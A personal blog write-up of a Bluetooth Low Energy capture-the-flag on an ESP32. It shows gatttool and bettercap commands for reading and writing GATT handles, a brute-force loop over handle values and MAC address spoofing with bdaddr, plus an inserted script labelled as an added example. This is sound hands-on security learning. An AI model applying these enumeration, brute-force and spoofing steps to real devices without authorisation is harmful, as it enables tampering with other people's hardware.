Bluetooth Low Energy (BLE) CTF

efran
5 min read, May 17, 2021

Hello! Lately, I’ve become interested in hardware security, and Bluetooth has always fascinated me. In this blog, I won’t explain what BLE is and what it’s used for, but I will discuss a BLE CTF.

Firstly, you need an ESP32 and a Bluetooth dongle to get started. Although you may not need the dongle, I purchased it anyway. To get started, you need to install the toolchain using this link. You can follow the instructions step by step and then clone the repository.

You can check the Bluetooth settings with hciconfig, then use “sudo rfkill list all,” “sudo rfkill unblock all,” and “sudo hciconfig hci1 up.” You can get the MAC address by using “sudo hcitool lescan.”

You can check the characteristics by using “sudo gatttool -I,” “help,” “connect <MAC address>,” and “characteristics.”

After you run bettercap, use “ble.recon on” and “ble.enum <MAC>.”

Show score with gatttool:
gatttool -b de:ad:be:ef:be:f1 --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\n'

Submit using gatttool:
gatttool -b de:ad:be:ef:be:f1 --char-write-req -a 0x002c -n $(echo -n "some flag value"|xxd -ps)

I could write a bash script for them, but I chose not to. You need to quit bettercap when using gatttool to submit and show the score.


We’ll use the 0x002c handle to write flags and read 0x002a for the score. There is a hint for the first level, which is an easy step.

Read the 0x002e handle and submit it to the 0x002c handle. Score: 2
I should have paid attention; I submitted 20 characters before.
Read the handle, write to it, read it again, submit the flag to 0x002c, and read the score handle.
I made a mistake on the first attempt.
Decimal 58 = hex 3a. Score: 7/20
I need to brute force the handle from 0x00 to 0xff, which was one of the hardest levels for me. I didn’t know how to use loops, and it was impossible to do it manually. It might be possible, but it would be time-wasting. HEX 0x00 = DEC 0, HEX 0xFF = DEC 255. I took the i value as a decimal and converted it to hex with printf %x $i. If i = 0: gatttool -b 7C:9E:BD:F9:C9:26 --char-write-req -a 0x003c -n $(echo -ne $a"0"|xxd -ps), where a is "\x", which gives:

gatttool -b 7C:9E:BD:F9:C9:26 --char-write-req -a 0x003c -n $(echo -ne "\x0"|xxd -ps)

If i = 1 it would be gatttool -b 7C:9E:BD:F9:C9:26 --char-write-req -a 0x003c -n $(echo -ne "\x01"|xxd -ps), and so on. SCORE: 8/20
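As an added example (not code from the post), here is the 0x00 to 0xff loop described above as a small script around gatttool. The MAC and the 0x003c handle are the post’s; the read-back handle, the BLE_CTF_RUN switch and the GATTTOOL override for dry runs are my assumptions. It decodes the read with printf instead of xxd so it also runs where xxd is not installed.

```shell
#!/bin/sh
# Added example (not from the post): the 0x00..0xff brute-force loop the text
# describes, built around gatttool. MAC and handle are the ones the post uses;
# the GATTTOOL stub hook and the read-back handle are assumptions.

# Hex string for gatttool -n from a decimal value 0..255.
# Same result as the post's: echo -ne "\x01" | xxd -ps  ->  01
byte_to_hex() {
    printf '%02x' "$1"
}

# Decode a gatttool --char-read line
# ("Characteristic value/descriptor: 48 69 ") into ASCII. Uses printf octal
# escapes instead of xxd -r -p, so it runs without xxd installed.
decode_read() {
    local hex pair
    hex=$(awk -F':' '{print $2}' | tr -d ' \n')
    while [ -n "$hex" ]; do
        pair=$(printf '%.2s' "$hex")
        printf "\\$(printf '%03o' "0x$pair")"
        hex=${hex#??}
    done
    printf '\n'
}

# Write every value 0x00..0xff to write_handle, then read read_handle back
# and decode it. GATTTOOL may be set to a stub function for a dry run.
brute_force_byte() {
    local mac="$1" write_handle="$2" read_handle="$3"
    local gatt="${GATTTOOL:-gatttool}" i hex
    i=0
    while [ "$i" -le 255 ]; do
        hex=$(byte_to_hex "$i")
        "$gatt" -b "$mac" --char-write-req -a "$write_handle" -n "$hex" >/dev/null 2>&1
        i=$((i + 1))
    done
    "$gatt" -b "$mac" --char-read -a "$read_handle" | decode_read
}

# Run against the real device only when asked (needs the ESP32 advertising).
if [ "${BLE_CTF_RUN:-0}" = "1" ]; then
    brute_force_byte 7C:9E:BD:F9:C9:26 0x003c 0x003c
fi
```

Run it with BLE_CTF_RUN=1 once bettercap is closed, since gatttool needs the adapter to itself.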

For this handle, I had to read it 1000 times, which was simple once I had learned to use for loops. Score: 9/20
Submit the flag to the 0x002c handle. Score: 10/20
Same process as the previous step: listen to the handle, convert hex to ASCII, and submit the flag. Score: 11/20
Listen for multiple notifications. It was clear that we were going to use the second notification. Score: 12/20
Score: 13/20
I struggled with this step. I needed to change the MAC address of my Bluetooth dongle, and I knew that `bdaddr` could do it. I tried running sudo bdaddr -i hci0 11:22:33:44:55:66, but the MAC address didn’t change. Instead of the previous command, you can use sudo bdaddr -i hci1 -r 11:22:33:44:55:66 and your Bluetooth dongle will be updated automatically; then read the 0x004c handle again, and the flag will be there. Score: 14/20
As we can see, the -m parameter may help.

Unfortunately, I was unable to change the MTU size using the command gatttool -b MAC -m 444. Instead, I used the gatttool interactive interface. What is MTU? You can take a look here for all the details.

Score: 15/20

On the 50th handle, I needed to do Write+resp ‘hello’, which seemed to have no significance. I wrote the message, read the response, and found the flag. However, I didn’t understand the purpose of this step or how it differed from the other examples. I’ll update here whenever I learn more.

Score:16/20
The NOTIFY property was about listening. Don’t just trust what BLE says; check it manually. Here is the flag. Score: 17/20
For this handle, read handle 54, write something, and read again. To take a look at the NOTIFY property, I listened to the handle. Score: 18/20

On the 56th handle, I had to write the MD5 of the author’s Twitter handle. It was quite simple, and I scored 19/20. However, I couldn’t reach the last handle, as I might have missed something. I went back to look at the handles again and realized that I had forgotten about the handle 0x0016.

Feel free to reach out to me if you think I missed something. Also, I would be grateful if you could provide any explanation for the 50th handle. Thank you for spending your time.
